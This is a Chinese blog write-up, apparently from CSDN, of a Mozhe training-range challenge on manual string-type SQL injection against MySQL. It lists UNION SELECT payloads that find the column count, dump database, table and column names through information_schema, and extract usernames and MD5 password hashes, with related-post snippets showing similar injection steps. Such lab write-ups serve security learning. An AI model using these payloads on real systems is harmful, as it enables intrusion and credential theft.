墨者 - SQL手工注入漏洞测试(MySQL数据库-字符型)

最新推荐文章于 2023-12-01 23:06:44 发布
最新推荐文章于 2023-12-01 23:06:44 发布
阅读量616 收藏 1
点赞数
分类专栏: 墨者刷题笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39936434/article/details/94841496
版权

字符型,其实与数字型得注入思路没什么区别,只不过需要注意构造单引号和后面加注释就行了

id=tingjigonggao' order by 1 -- 测试 字段个数,发现有4个

 试过盲猜表,admin,manger,失败

 老老实实暴库,先测回显位置  id=tingjigongga' union select '1','2','3','4' -- 

 

 

/new_list.php?id=tingjigongga' union select '1',database(),'3','4' --      爆库

 id=tingjigongga' union select '1',(select group_concat(table_name) from information_schema.tables where table_schema = 'mozhe_discuz_stormgroup' limit 0,1),'3','4' --     爆表

 

id=tingjigonggao1' union select '1',(select group_concat(column_name) from information_schema.columns where table_name='stormgroup_member'),'3','4' --      爆字段

id=tingjigonggao1' union select '1',(select group_concat(name,0x7c,password,0x7e) from stormgroup_member),'3','4' --    

爆字段值

MD5在线解密即可 

吃肉唐僧
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
m0_73681638的博客
06-16 294
通常 Sql 注入漏洞分为 2 种类:数字字符。数字判断:在加载好的Url 地址中输入and 1=1,页面依旧运行正常,继续进行下一步。断网页是否存在sql注入使用单引号判断法:在参数后面加上单引号, 原因为无论字符还是整都会 因为单引号个数不匹配而报错。使用火狐插件—hackbar,加载出当前界面的url,使用单引号判断法,页面返回错误,存在 Sql 注 入。
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符)
Lollipop_zhi的博客
02-26 2223
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符)
Sa1nZen的博客
08-24 170
SQL手工注入漏洞测试MySQL数据库-字符
墨者靶场SQL手工注入漏洞测试(MySQL数据库-字符)
zyh1588的博客
11-01 191
小白回顾墨者靶场手工注入
SQL手工注入漏洞测试(MySQL数据库-字符)-墨者
weoptions的博客
12-01 1697
———靶场专栏———分享我的解题过程
sql注入-墨者学院SQL手工注入漏洞测试(MySQL数据库)
m0_75178803的博客
04-15 816
猜解列名字段数(数量) order by x 错误与正常的正常值的的连接点。union select 1,2,3,4 页面正常。回到题目上来,我们在id=1后面随意输入一些东西。order by 4,页面正常。order by 1,网站正常。order by 5,页面错误。文章基于小迪sql注入的复现。页面错误,说明id为注入点。我们即可得知有4个字段数。and 1=1 页面正常。and 1=2 页面错误。
墨者靶场-SQL手工注入漏洞测试(Access数据库)
Sa1nZen的博客
08-26 229
墨者靶场-SQL手工注入漏洞测试(Access数据库)
墨者-SQL手工注入漏洞测试(Sql Server数据库) 题解
Redredredfish的博客
12-13 3054
靶场地址:https://www.mozhe.cn/bug/detail/SXlYMWZhSm15QzM1OGpyV21BR1p2QT09bW96aGUmozhe ①老样子url:http://219.153.49.228:49515/new_list.asp?id=2 判断id存在数字注入 ②判断当前字段数 id=2 order by 4 正常 id=2 order by 5 报错 字段数为4 ③联合查询当前数据库 先用mysql的语法试一试 第一个坑: id = 2 union select 1,2,
sql注入(2) 墨者学院之SQL手工注入漏洞测试MySQL数据库-字符
c10udz的博客
04-12 4116
这里我们可以看到版本是10.2.15,前面说过MySQL5.0版本以上有个自带的information_shema数据库,利用这个数据库可以查到整个数据库的结构,不然就只能盲猜了。//注释:(1)information_schema.tables表示information_schena这个数据库下的表,在MySQL中【.】代表下一级。利用'order by 任意数字 %23去判断,得到4(结尾加%23的原因:在一个语句结尾时,需要用#结尾,而#的url编码就是%23)table_schema:数据库名。
[SQL 注入] 墨者靶场 SQL手工注入漏洞测试(MySQL数据库-字符)
Tiantangbujimo7的博客
01-04 849
SQL注入学习初次尝试SQL注入SQLmap一把梭 查找sql注入漏洞位置 发现红框地方有SQL 注入漏洞 初次尝试SQL注入 开整 其实是为了测试 1’and 1=1# '; http://靶场IP:端口/new_list.php?id=tingjigonggao%201%27and%201=1#%20' 看到这边我直接懵逼了,为什么加上 '# 过滤都不可以了,查阅资料后发现还有其它注释样式: #、 --+、 --%20、 %23 1.开始漏洞检测: http://靶场IP:端口/new_li
APP原实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原源文件
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
墨者安全软件-免费杀毒软件
11-11
墨者安全专家是一款永久免费的免疫安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
墨者 - SQL注入漏洞测试(布尔盲注)
吃肉唐僧的博客
07-01 5106
手工注入 根据浮动的通告进度条,找到sql注入点 输入/new_list.php?id=1' and 1=1,内容空白 输入/new_list.php?id=1 and 1=1,内容显示,判断这个id的值类是数字类 然后开始判断数据库名字的长度,/new_list.php?id=1 and length(database())=1,内容空白。一直试,试到长度为10 ...
墨者 - X-Forwarded-For注入漏洞实战
吃肉唐僧的博客
07-10 3983
X-Forwarded-For 刷题之前先知道这个是什么东西,X-Forwarded-For 是一个 HTTP 扩展头部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大 HTTP 代理、负载均衡等转发服务广泛使用,并被写入RFC 7239(Forwarded...
墨者 - Struts2 命令执行系列
吃肉唐僧的博客
06-30 2901
前言 刷了好几道Struts2远程代码执行漏洞,发觉虽然触发不同,但是本质道理一样。所以整合一下目前刷过的Struts2系列漏洞。以后刷了新的再补充。 ongl 表达式 Struts2 命令执行的原因都是是通过 Ognl 表达式执行 java 代码,最终实现命令执行。所以应该需要先了解 ognl 表达式 。 此处引用http://www.zerokeeper.com/...
墨者 - 安卓手机文件分析取证(陌陌ID号)
吃肉唐僧的博客
07-04 2864
上网搜索,陌陌的文件夹名叫immomo 看见users文件夹,这里都是用户id,试第一个就成功了
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值